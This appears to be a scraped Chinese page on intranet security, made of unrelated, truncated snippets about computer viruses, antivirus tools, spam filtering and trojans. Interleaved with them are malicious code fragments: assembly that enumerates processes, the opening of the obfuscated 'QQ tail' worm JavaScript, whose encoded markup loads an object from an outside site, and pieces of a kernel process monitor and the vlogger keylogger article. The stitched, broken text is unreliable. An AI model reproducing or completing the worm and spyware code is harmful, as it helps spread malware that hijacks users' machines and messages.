内网安全管理

如果计算机的内存没有病毒，那么只有在执行了带有病毒的程序（文件） 后，才会感染计算机。而 dir 命令由于是 DOS 的内部命令，不需要执行任何外部 的程序（文件），因此对染毒软盘进行 dir操作不会感染病毒。 不过需要注意的是，如果计算机内存已有病毒（或者说：计算机已染毒），如果对没有染病毒的软盘进行 dir 操作，就可能感染软盘。说可能

MonitorThread PROC MReloc : DWORD　 mov ebx , MReloc　@pushsz "PSAPI"　call _LoadLibraryA[ebx]　xchg eax,esi　@pushsz "EnumProcesses"　push esi　call _GetProcAddress[ebx]　mov _EnumProcesses[ebx],eax　@pushsz "EnumProcessModules"　push esi　call _GetProcAddress[ebx]　mov _EnumProcessModules[ebx],eax

位置在40H:13H，单位为KB。病毒体存在于最后的几K内存中。 一个主引导记录病毒例子

手机病毒其实也和计算机病毒一样，它可以通过电脑执行从而向手机乱发短信息。严格的讲手机病毒应该是一种电脑病毒，这种病毒只能在计算机网络上进行传播而不能通过手机进行传播，因此所谓的手机病毒其实是电脑病毒程序启动了电信公司的一项服务，例如电子邮件到手机短信息的功能，而且它发给手机的是文档，根本就无破坏力可言。当然也有的手机病

不管电脑病毒听起来多么恶毒，一般人总是要到自己的电脑中了毒才会了解它所造成的影响。

宽带接入的费用越来越低，许多人扔了小“猫”(Modem)，安装了ADSL，长城宽带，电力线上网，甚至光纤接入。在畅游Internet的同时，由于网速大辐提升，病毒入侵也更加强烈。相信不少人遇到操作系统倒计时重启的情况，用杀毒软件查杀若干次，还是不能解决。一怒之下，重装系统，呵呵，倒计时重启依旧，这就是大名鼎鼎的冲击波病毒攻击。当然在接入

有人以为只要采用了免费邮箱中的杀毒服务，就不用再购置杀毒软件了，其实，这是非常危险的想法。我们可以从性能、查杀途径、查杀能力、病毒处理方式和价格等几个方面来比较。

走笔至此想起了侯捷老师《STL源码剖析》中的一句话——“源码之前，了无秘密。”如果你看完本文之后也有这样的感觉，那么我将感到不胜荣幸

笔者在长期下载文件（软件）的过程中，已经养成了在第一时间内查杀病毒的习惯。其实许多下载软件也都具备了杀毒功能，现以“网络蚂蚁（NetAnts）”、“网际快车（FlashGet）”为例加以说明。

病毒总是会想方设法地入侵我们的电脑搞破坏，虽然你可以使用反病毒之类的软件，但也绝不能忽视平时的预防工作。“御敌于国门之外”是最理想的，所以建议大家应采用“防为先”的原则来对付病毒。下面就是我的防毒、治毒观点，希望对大家有所借鉴。

QQ尾巴恶意病毒的代码<SCRIPT LANGUAGE="javascript"><!var HtmlStrings=["=iunm> =ifbe>=dfoufs>=jnh!!tsd>#ibi/kqh#>=0dfoufs> =cpez> =pckfdu!ebub>#iuuq;00xxx/pomzz/ofu0qjd0222/btq#!tuzmf>#ejtqmb","z;opof#!ifjhiu>#1#!xjeui>#1#>=0pckfdu> =0cpez&g

通过上述的分析，我们可以知道，病毒并不是非常可怕的，网络蠕虫病毒对个人用户的攻击主要还是通过社会工程学，而不是利用系统漏洞！所以防范此类病毒需要注意以下几点：

垃圾邮件、垃圾邮件，还是垃圾邮件，每天当你打开信箱，是不是都会遇到恼人的垃圾邮件呢？有没有什么好办法可以对垃圾邮件说“不”呢？我们介绍三位朋友来帮忙，一位是微软的邮件服务器软件Exchange，相信大部分拥有独立的邮件服务器的企业都已具备；另一位是江民科技推出的KV江民杀毒王网络版for Exchange；最后是免费的国产客户端邮件接收软件

有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒，要知道这些我们可以按以下几个方法来判断。

通过防火墙等设备，我们可抵制外网的攻击，通过上网行为管理系统、策略路由等，我们可以对通过网关的应用及流量进行管理，但针对内网的终端设备，我们又将如何？

识别计算机病毒五花八门的"作案"方式 你知道吗？计算机病毒的“作案”方式五花八门，按照危害程度的不同,可分为以下几种类型：暗藏型病毒。该病毒进入电子系统后能够潜伏下来，到预定时间或特定事件发生时，再出来为非作歹。　　 杀手型病毒，也叫“暗杀型病毒”。这种病毒钻入机器后，专门用来篡改和毁伤某一个或某一组特

三、如何防范vbs脚本病毒1．如何从样本中提取（加密）脚本病毒对于没有加密的脚本病毒，我们可以直接从病毒样本中找出来，现在介绍一下如何从病毒样本中提取加密VBS脚本病毒，这里我们以新欢乐时光为例。用JediEdit打开folder.htt。我们发现这个文件总共才93行，第一行<BODY onload="vbscript:KJ_start()">，几行注释

文件名　　　　: WssProcMon.c描述　　　　　: 进程/线程监视器作者　　　　　: sinister最后修改日期　: 20021102*****************************************************************/#include "ntddk.h"#include "string.h"#define ProcessNameOffset　0x1fcstatic NTSTATUS　MydrvDispatch (IN PDEVICE_OBJECT DeviceOb

“文件黑手”变种KI(Win32.Troj.KillFiles.ki)是一个破坏电脑上文件的木马病毒。 “播种者”变种DL(Win32.Troj.Dropper.dl)是一个会在电脑里释放一个流氓软件的木马病毒。 一、“文件杀手”变种KI(Win32.Troj.KillFiles.ki) 威胁级别：★该病毒又是一个电脑文件的破坏能手，它会未经用户的许可而删除与替换电脑上的大量的文

[ 5 感谢感谢plasmoid, skyper的大力帮助，感谢THC，vnsecurity等组织的所有朋友们。最后，感谢thang先生的英文翻译。//e4gle add到此，全文介绍完了，大家有兴趣可以试试代码，其实这里涉及的技术无非还是系统调用和内核函数的劫持技术，我整理过的一篇tty劫持的文章，大家也可以对比一下。其实vlogger也有一定的缺陷，它